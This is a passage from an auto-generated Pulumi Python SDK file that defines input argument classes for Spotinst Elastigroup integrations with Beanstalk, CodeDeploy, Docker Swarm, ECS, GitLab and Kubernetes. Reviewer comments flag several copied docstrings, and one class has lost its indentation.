    def batch_size_percentage(self) -> Optional[pulumi.Input[int]]:
        """Percentage of the instances to deploy in each batch."""
        return pulumi.get(self, "batch_size_percentage")

    @batch_size_percentage.setter
    def batch_size_percentage(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "batch_size_percentage", value)

    @property
    @pulumi.getter(name="gracePeriod")
    def grace_period(self) -> Optional[pulumi.Input[int]]:
        """Grace period for new instances to become healthy."""
        return pulumi.get(self, "grace_period")

    @grace_period.setter
    def grace_period(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "grace_period", value)

    @property
    @pulumi.getter
    def strategy(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']]:
        """Strategy parameters."""
        return pulumi.get(self, "strategy")

    @strategy.setter
    def strategy(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs']]):
        pulumi.set(self, "strategy", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs:
    """Roll strategy for the Beanstalk deployment preferences."""

    def __init__(__self__, *,
                 action: Optional[pulumi.Input[str]] = None,
                 should_drain_instances: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[str] action: Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`.
        :param pulumi.Input[bool] should_drain_instances: Specify whether to drain incoming TCP connections before terminating a server.
        """
        # Register only the arguments the caller actually supplied.
        for attr_name, attr_value in (
                ("action", action),
                ("should_drain_instances", should_drain_instances)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter
    def action(self) -> Optional[pulumi.Input[str]]:
        """Action to take. Valid values: `REPLACE_SERVER`, `RESTART_SERVER`."""
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter(name="shouldDrainInstances")
    def should_drain_instances(self) -> Optional[pulumi.Input[bool]]:
        """Whether to drain incoming TCP connections before terminating a server."""
        return pulumi.get(self, "should_drain_instances")

    @should_drain_instances.setter
    def should_drain_instances(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "should_drain_instances", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkManagedActionsArgs:
    """Managed-actions settings for the Beanstalk integration."""

    def __init__(__self__, *,
                 platform_update: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']] = None):
        """
        :param pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs'] platform_update: Platform Update parameters
        """
        # Store platform_update only when it was explicitly supplied.
        if platform_update is not None:
            pulumi.set(__self__, "platform_update", platform_update)

    @property
    @pulumi.getter(name="platformUpdate")
    def platform_update(self) -> Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']]:
        """Platform Update parameters."""
        return pulumi.get(self, "platform_update")

    @platform_update.setter
    def platform_update(self, value: Optional[pulumi.Input['ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs']]):
        pulumi.set(self, "platform_update", value)
@pulumi.input_type
class ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs:
    """Platform-update parameters for Beanstalk managed actions."""

    def __init__(__self__, *,
                 perform_at: Optional[pulumi.Input[str]] = None,
                 time_window: Optional[pulumi.Input[str]] = None,
                 update_level: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] perform_at: Actions to perform (options: timeWindow, never)
        :param pulumi.Input[str] time_window: Time Window for when action occurs ex. Mon:23:50-Tue:00:20
        :param pulumi.Input[str] update_level: Level to update
        """
        # Register only the arguments the caller actually supplied.
        for attr_name, attr_value in (
                ("perform_at", perform_at),
                ("time_window", time_window),
                ("update_level", update_level)):
            if attr_value is not None:
                pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="performAt")
    def perform_at(self) -> Optional[pulumi.Input[str]]:
        """Actions to perform (options: timeWindow, never)."""
        return pulumi.get(self, "perform_at")

    @perform_at.setter
    def perform_at(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "perform_at", value)

    @property
    @pulumi.getter(name="timeWindow")
    def time_window(self) -> Optional[pulumi.Input[str]]:
        """Time window in which the action occurs, e.g. Mon:23:50-Tue:00:20."""
        return pulumi.get(self, "time_window")

    @time_window.setter
    def time_window(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_window", value)

    @property
    @pulumi.getter(name="updateLevel")
    def update_level(self) -> Optional[pulumi.Input[str]]:
        """Level to update."""
        return pulumi.get(self, "update_level")

    @update_level.setter
    def update_level(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "update_level", value)
@pulumi.input_type
class ElastigroupIntegrationCodedeployArgs:
    """CodeDeploy integration settings for an Elastigroup."""

    def __init__(__self__, *,
                 cleanup_on_failure: pulumi.Input[bool],
                 deployment_groups: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]],
                 terminate_instance_on_failure: pulumi.Input[bool]):
        """
        :param pulumi.Input[bool] cleanup_on_failure: Cleanup automatically after a failed deploy.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]] deployment_groups: Specify the deployment groups details.
        :param pulumi.Input[bool] terminate_instance_on_failure: Terminate the instance automatically after a failed deploy.
        """
        # All three arguments are required.
        for attr_name, attr_value in (
                ("cleanup_on_failure", cleanup_on_failure),
                ("deployment_groups", deployment_groups),
                ("terminate_instance_on_failure", terminate_instance_on_failure)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="cleanupOnFailure")
    def cleanup_on_failure(self) -> pulumi.Input[bool]:
        """Cleanup automatically after a failed deploy."""
        return pulumi.get(self, "cleanup_on_failure")

    @cleanup_on_failure.setter
    def cleanup_on_failure(self, value: pulumi.Input[bool]):
        pulumi.set(self, "cleanup_on_failure", value)

    @property
    @pulumi.getter(name="deploymentGroups")
    def deployment_groups(self) -> pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]]:
        """Deployment groups details."""
        return pulumi.get(self, "deployment_groups")

    @deployment_groups.setter
    def deployment_groups(self, value: pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationCodedeployDeploymentGroupArgs']]]):
        pulumi.set(self, "deployment_groups", value)

    @property
    @pulumi.getter(name="terminateInstanceOnFailure")
    def terminate_instance_on_failure(self) -> pulumi.Input[bool]:
        """Terminate the instance automatically after a failed deploy."""
        return pulumi.get(self, "terminate_instance_on_failure")

    @terminate_instance_on_failure.setter
    def terminate_instance_on_failure(self, value: pulumi.Input[bool]):
        pulumi.set(self, "terminate_instance_on_failure", value)
@pulumi.input_type
class ElastigroupIntegrationCodedeployDeploymentGroupArgs:
    """A single CodeDeploy deployment group reference."""

    def __init__(__self__, *,
                 application_name: pulumi.Input[str],
                 deployment_group_name: pulumi.Input[str]):
        """
        :param pulumi.Input[str] application_name: The application name.
        :param pulumi.Input[str] deployment_group_name: The deployment group name.
        """
        # Both arguments are required.
        for attr_name, attr_value in (
                ("application_name", application_name),
                ("deployment_group_name", deployment_group_name)):
            pulumi.set(__self__, attr_name, attr_value)

    @property
    @pulumi.getter(name="applicationName")
    def application_name(self) -> pulumi.Input[str]:
        """The application name."""
        return pulumi.get(self, "application_name")

    @application_name.setter
    def application_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "application_name", value)

    @property
    @pulumi.getter(name="deploymentGroupName")
    def deployment_group_name(self) -> pulumi.Input[str]:
        """The deployment group name."""
        return pulumi.get(self, "deployment_group_name")

    @deployment_group_name.setter
    def deployment_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "deployment_group_name", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmArgs:
def __init__(__self__, *,
master_host: pulumi.Input[str],
master_port: pulumi.Input[int],
autoscale_cooldown: Optional[pulumi.Input[int]] = None,
autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']] = None,
autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']] = None,
autoscale_is_enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] master_host: The URL for the Nomad master host.
:param pulumi.Input[int] master_port: The network port for the master host.
:param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
:param pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
:param pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
:param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
"""
pulumi.set(__self__, "master_host", master_host)
pulumi.set(__self__, "master_port", master_port)
if autoscale_cooldown is not None:
pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
if autoscale_down is not None:
pulumi.set(__self__, "autoscale_down", autoscale_down)
if autoscale_headroom is not None:
pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
if autoscale_is_enabled is not None:
pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
@property
@pulumi.getter(name="masterHost")
def master_host(self) -> pulumi.Input[str]:
"""
The URL for the Nomad master host.
"""
return pulumi.get(self, "master_host")
@master_host.setter
def master_host(self, value: pulumi.Input[str]):
pulumi.set(self, "master_host", value)
@property
@pulumi.getter(name="masterPort")
def master_port(self) -> pulumi.Input[int]:
"""
The network port for the master host.
"""
return pulumi.get(self, "master_port")
@master_port.setter
def master_port(self, value: pulumi.Input[int]):
pulumi.set(self, "master_port", value)
@property
@pulumi.getter(name="autoscaleCooldown")
def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
"""
return pulumi.get(self, "autoscale_cooldown")
@autoscale_cooldown.setter
def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "autoscale_cooldown", value)
@property
@pulumi.getter(name="autoscaleDown")
def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']]:
"""
Settings for scale down actions.
"""
return pulumi.get(self, "autoscale_down")
@autoscale_down.setter
def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleDownArgs']]):
pulumi.set(self, "autoscale_down", value)
    @property
    @pulumi.getter(name="autoscaleHeadroom")
    def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']]:
        """
        An option to set compute reserve for the cluster.
        """
        return pulumi.get(self, "autoscale_headroom")
    @autoscale_headroom.setter
    def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs']]):
        pulumi.set(self, "autoscale_headroom", value)
    @property
    @pulumi.getter(name="autoscaleIsEnabled")
    def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the auto scaling feature is enabled.
        """
        return pulumi.get(self, "autoscale_is_enabled")
    @autoscale_is_enabled.setter
    def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmAutoscaleDownArgs:
    """Scale-down settings for the Docker Swarm autoscaler integration."""
    def __init__(__self__, *,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
        """
        :param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
        :param pulumi.Input[float] max_scale_down_percentage: The maximum percentage to scale down in a single action. Number between 1-100.
        """
        # Optional fields are forwarded only when explicitly provided,
        # so unset values are omitted from the resulting input map.
        if evaluation_periods is not None:
            pulumi.set(__self__, "evaluation_periods", evaluation_periods)
        if max_scale_down_percentage is not None:
            pulumi.set(__self__, "max_scale_down_percentage", max_scale_down_percentage)
    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        How many evaluation periods should accumulate before a scale down action takes place.
        """
        return pulumi.get(self, "evaluation_periods")
    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)
    @property
    @pulumi.getter(name="maxScaleDownPercentage")
    def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
        """
        The maximum percentage to scale down in a single action. Number between 1-100.
        """
        return pulumi.get(self, "max_scale_down_percentage")
    @max_scale_down_percentage.setter
    def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs:
    """Compute headroom (spare capacity reserve) for the Docker Swarm autoscaler."""
    def __init__(__self__, *,
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None,
                 num_of_units: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
        :param pulumi.Input[int] memory_per_unit: How much memory to allocate for headroom unit.
        :param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
        """
        # Optional fields are forwarded only when explicitly provided.
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)
        if num_of_units is not None:
            pulumi.set(__self__, "num_of_units", num_of_units)
    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much CPU (MHz) to allocate for headroom unit.
        """
        return pulumi.get(self, "cpu_per_unit")
    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)
    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much memory to allocate for headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")
    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)
    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> Optional[pulumi.Input[int]]:
        """
        How many units of headroom to allocate.
        """
        return pulumi.get(self, "num_of_units")
    @num_of_units.setter
    def num_of_units(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationEcsArgs:
    """Configuration for the Amazon ECS integration of an Elastigroup."""
    def __init__(__self__, *,
                 cluster_name: pulumi.Input[str],
                 autoscale_attributes: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]] = None,
                 autoscale_cooldown: Optional[pulumi.Input[int]] = None,
                 autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']] = None,
                 autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']] = None,
                 autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
                 autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
                 autoscale_scale_down_non_service_tasks: Optional[pulumi.Input[bool]] = None,
                 batch: Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']] = None):
        """
        :param pulumi.Input[str] cluster_name: The name of the EC2 Container Service cluster.
        :param pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]] autoscale_attributes: A list of key/value attributes for the auto scaler.
               NOTE(review): upstream doc said "tags to assign to the resource", but the
               element type is an attribute key/value pair — confirm against provider docs.
        :param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
        :param pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
        :param pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
        :param pulumi.Input[bool] autoscale_is_auto_config: Enables automatic configuration of the auto-scaler.
               NOTE(review): upstream doc referenced the Kubernetes auto scaler here — likely a
               generator copy/paste; this class is the ECS integration.
        :param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
        :param pulumi.Input[bool] autoscale_scale_down_non_service_tasks: Determines whether to scale down non-service tasks.
        :param pulumi.Input['ElastigroupIntegrationEcsBatchArgs'] batch: Batch configuration object:
        """
        # cluster_name is the only required field; every other field is
        # forwarded only when explicitly provided.
        pulumi.set(__self__, "cluster_name", cluster_name)
        if autoscale_attributes is not None:
            pulumi.set(__self__, "autoscale_attributes", autoscale_attributes)
        if autoscale_cooldown is not None:
            pulumi.set(__self__, "autoscale_cooldown", autoscale_cooldown)
        if autoscale_down is not None:
            pulumi.set(__self__, "autoscale_down", autoscale_down)
        if autoscale_headroom is not None:
            pulumi.set(__self__, "autoscale_headroom", autoscale_headroom)
        if autoscale_is_auto_config is not None:
            pulumi.set(__self__, "autoscale_is_auto_config", autoscale_is_auto_config)
        if autoscale_is_enabled is not None:
            pulumi.set(__self__, "autoscale_is_enabled", autoscale_is_enabled)
        if autoscale_scale_down_non_service_tasks is not None:
            pulumi.set(__self__, "autoscale_scale_down_non_service_tasks", autoscale_scale_down_non_service_tasks)
        if batch is not None:
            pulumi.set(__self__, "batch", batch)
    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> pulumi.Input[str]:
        """
        The name of the EC2 Container Service cluster.
        """
        return pulumi.get(self, "cluster_name")
    @cluster_name.setter
    def cluster_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "cluster_name", value)
    @property
    @pulumi.getter(name="autoscaleAttributes")
    def autoscale_attributes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]]:
        """
        A list of key/value attributes for the auto scaler.
        """
        return pulumi.get(self, "autoscale_attributes")
    @autoscale_attributes.setter
    def autoscale_attributes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationEcsAutoscaleAttributeArgs']]]]):
        pulumi.set(self, "autoscale_attributes", value)
    @property
    @pulumi.getter(name="autoscaleCooldown")
    def autoscale_cooldown(self) -> Optional[pulumi.Input[int]]:
        """
        The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
        """
        return pulumi.get(self, "autoscale_cooldown")
    @autoscale_cooldown.setter
    def autoscale_cooldown(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "autoscale_cooldown", value)
    @property
    @pulumi.getter(name="autoscaleDown")
    def autoscale_down(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']]:
        """
        Settings for scale down actions.
        """
        return pulumi.get(self, "autoscale_down")
    @autoscale_down.setter
    def autoscale_down(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleDownArgs']]):
        pulumi.set(self, "autoscale_down", value)
    @property
    @pulumi.getter(name="autoscaleHeadroom")
    def autoscale_headroom(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']]:
        """
        An option to set compute reserve for the cluster.
        """
        return pulumi.get(self, "autoscale_headroom")
    @autoscale_headroom.setter
    def autoscale_headroom(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsAutoscaleHeadroomArgs']]):
        pulumi.set(self, "autoscale_headroom", value)
    @property
    @pulumi.getter(name="autoscaleIsAutoConfig")
    def autoscale_is_auto_config(self) -> Optional[pulumi.Input[bool]]:
        """
        Enables automatic configuration of the auto-scaler.
        """
        return pulumi.get(self, "autoscale_is_auto_config")
    @autoscale_is_auto_config.setter
    def autoscale_is_auto_config(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_auto_config", value)
    @property
    @pulumi.getter(name="autoscaleIsEnabled")
    def autoscale_is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the auto scaling feature is enabled.
        """
        return pulumi.get(self, "autoscale_is_enabled")
    @autoscale_is_enabled.setter
    def autoscale_is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_is_enabled", value)
    @property
    @pulumi.getter(name="autoscaleScaleDownNonServiceTasks")
    def autoscale_scale_down_non_service_tasks(self) -> Optional[pulumi.Input[bool]]:
        """
        Determines whether to scale down non-service tasks.
        """
        return pulumi.get(self, "autoscale_scale_down_non_service_tasks")
    @autoscale_scale_down_non_service_tasks.setter
    def autoscale_scale_down_non_service_tasks(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "autoscale_scale_down_non_service_tasks", value)
    @property
    @pulumi.getter
    def batch(self) -> Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']]:
        """
        Batch configuration object:
        """
        return pulumi.get(self, "batch")
    @batch.setter
    def batch(self, value: Optional[pulumi.Input['ElastigroupIntegrationEcsBatchArgs']]):
        pulumi.set(self, "batch", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleAttributeArgs:
    """A single key/value attribute used by the ECS autoscaler."""
    def __init__(__self__, *,
                 key: pulumi.Input[str],
                 value: pulumi.Input[str]):
        """
        :param pulumi.Input[str] key: The attribute key.
        :param pulumi.Input[str] value: The attribute value.
               NOTE(review): upstream doc said "The dimension value" — likely a copy/paste
               from a CloudWatch-dimension type; this class models an autoscale attribute.
        """
        # Both fields are required.
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "value", value)
    @property
    @pulumi.getter
    def key(self) -> pulumi.Input[str]:
        """
        The attribute key.
        """
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: pulumi.Input[str]):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def value(self) -> pulumi.Input[str]:
        """
        The attribute value.
        """
        return pulumi.get(self, "value")
    @value.setter
    def value(self, value: pulumi.Input[str]):
        pulumi.set(self, "value", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleDownArgs:
    """Scale-down settings for the ECS autoscaler integration."""
    def __init__(__self__, *,
                 evaluation_periods: Optional[pulumi.Input[int]] = None,
                 max_scale_down_percentage: Optional[pulumi.Input[float]] = None):
        """
        :param pulumi.Input[int] evaluation_periods: How many evaluation periods should accumulate before a scale down action takes place.
        :param pulumi.Input[float] max_scale_down_percentage: The maximum percentage to scale down in a single action. Number between 1-100.
        """
        # Optional fields are forwarded only when explicitly provided.
        if evaluation_periods is not None:
            pulumi.set(__self__, "evaluation_periods", evaluation_periods)
        if max_scale_down_percentage is not None:
            pulumi.set(__self__, "max_scale_down_percentage", max_scale_down_percentage)
    @property
    @pulumi.getter(name="evaluationPeriods")
    def evaluation_periods(self) -> Optional[pulumi.Input[int]]:
        """
        How many evaluation periods should accumulate before a scale down action takes place.
        """
        return pulumi.get(self, "evaluation_periods")
    @evaluation_periods.setter
    def evaluation_periods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "evaluation_periods", value)
    @property
    @pulumi.getter(name="maxScaleDownPercentage")
    def max_scale_down_percentage(self) -> Optional[pulumi.Input[float]]:
        """
        The maximum percentage to scale down in a single action. Number between 1-100.
        """
        return pulumi.get(self, "max_scale_down_percentage")
    @max_scale_down_percentage.setter
    def max_scale_down_percentage(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "max_scale_down_percentage", value)
@pulumi.input_type
class ElastigroupIntegrationEcsAutoscaleHeadroomArgs:
    """Compute headroom (spare capacity reserve) for the ECS autoscaler."""
    def __init__(__self__, *,
                 cpu_per_unit: Optional[pulumi.Input[int]] = None,
                 memory_per_unit: Optional[pulumi.Input[int]] = None,
                 num_of_units: Optional[pulumi.Input[int]] = None):
        """
        :param pulumi.Input[int] cpu_per_unit: How much CPU (MHz) to allocate for headroom unit.
        :param pulumi.Input[int] memory_per_unit: How much memory to allocate for headroom unit.
        :param pulumi.Input[int] num_of_units: How many units of headroom to allocate.
        """
        # Optional fields are forwarded only when explicitly provided.
        if cpu_per_unit is not None:
            pulumi.set(__self__, "cpu_per_unit", cpu_per_unit)
        if memory_per_unit is not None:
            pulumi.set(__self__, "memory_per_unit", memory_per_unit)
        if num_of_units is not None:
            pulumi.set(__self__, "num_of_units", num_of_units)
    @property
    @pulumi.getter(name="cpuPerUnit")
    def cpu_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much CPU (MHz) to allocate for headroom unit.
        """
        return pulumi.get(self, "cpu_per_unit")
    @cpu_per_unit.setter
    def cpu_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "cpu_per_unit", value)
    @property
    @pulumi.getter(name="memoryPerUnit")
    def memory_per_unit(self) -> Optional[pulumi.Input[int]]:
        """
        How much memory to allocate for headroom unit.
        """
        return pulumi.get(self, "memory_per_unit")
    @memory_per_unit.setter
    def memory_per_unit(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "memory_per_unit", value)
    @property
    @pulumi.getter(name="numOfUnits")
    def num_of_units(self) -> Optional[pulumi.Input[int]]:
        """
        How many units of headroom to allocate.
        """
        return pulumi.get(self, "num_of_units")
    @num_of_units.setter
    def num_of_units(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "num_of_units", value)
@pulumi.input_type
class ElastigroupIntegrationEcsBatchArgs:
    """Batch configuration for the ECS integration."""
    def __init__(__self__, *,
                 job_queue_names: pulumi.Input[Sequence[pulumi.Input[str]]]):
        """
        :param pulumi.Input[Sequence[pulumi.Input[str]]] job_queue_names: Array of strings (batch job-queue names).
        """
        # job_queue_names is required.
        pulumi.set(__self__, "job_queue_names", job_queue_names)
    @property
    @pulumi.getter(name="jobQueueNames")
    def job_queue_names(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """
        Array of strings (batch job-queue names).
        """
        return pulumi.get(self, "job_queue_names")
    @job_queue_names.setter
    def job_queue_names(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "job_queue_names", value)
@pulumi.input_type
class ElastigroupIntegrationGitlabArgs:
    """Configuration for the GitLab integration of an Elastigroup."""
    def __init__(__self__, *,
                 runner: Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']] = None):
        """
        :param pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs'] runner: Settings for Gitlab runner.
        """
        # runner is optional and is forwarded only when explicitly provided.
        if runner is not None:
            pulumi.set(__self__, "runner", runner)
    @property
    @pulumi.getter
    def runner(self) -> Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']]:
        """
        Settings for Gitlab runner.
        """
        return pulumi.get(self, "runner")
    @runner.setter
    def runner(self, value: Optional[pulumi.Input['ElastigroupIntegrationGitlabRunnerArgs']]):
        pulumi.set(self, "runner", value)
@pulumi.input_type
class ElastigroupIntegrationGitlabRunnerArgs:
    """GitLab runner settings for the GitLab integration."""
    def __init__(__self__, *,
                 is_enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[bool] is_enabled: Specifies whether the integration is enabled.
        """
        # is_enabled is optional and is forwarded only when explicitly provided.
        if is_enabled is not None:
            pulumi.set(__self__, "is_enabled", is_enabled)
    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies whether the integration is enabled.
        """
        return pulumi.get(self, "is_enabled")
    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class ElastigroupIntegrationKubernetesArgs:
    """Configuration for the Kubernetes integration of an Elastigroup."""
    def __init__(__self__, *,
                 api_server: Optional[pulumi.Input[str]] = None,
                 autoscale_cooldown: Optional[pulumi.Input[int]] = None,
                 autoscale_down: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs']] = None,
                 autoscale_headroom: Optional[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs']] = None,
                 autoscale_is_auto_config: Optional[pulumi.Input[bool]] = None,
                 autoscale_is_enabled: Optional[pulumi.Input[bool]] = None,
                 autoscale_labels: Optional[pulumi.Input[Sequence[pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleLabelArgs']]]] = None,
                 cluster_identifier: Optional[pulumi.Input[str]] = None,
                 integration_mode: Optional[pulumi.Input[str]] = None,
                 token: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] api_server: The address of the Kubernetes API server.
               NOTE(review): upstream doc said "The public IP of the DC/OS Master" — likely a
               generator copy/paste from the Mesosphere integration; confirm against provider docs.
        :param pulumi.Input[int] autoscale_cooldown: The amount of time, in seconds, after a scaling activity completes before any further trigger-related scaling activities can start.
        :param pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleDownArgs'] autoscale_down: Settings for scale down actions.
        :param pulumi.Input['ElastigroupIntegrationKubernetesAutoscaleHeadroomArgs'] autoscale_headroom: An option to set compute reserve for the cluster.
        :param pulumi.Input[bool] autoscale_is_auto_config: Enabling the automatic k8s auto-scaler functionality. For more information please see: [Kubernetes auto scaler](https://api.spotinst.com/integration-docs/elastigroup/container-management/kubernetes/autoscaler/).
        :param pulumi.Input[bool] autoscale_is_enabled: Specifies whether the auto scaling feature is enabled.
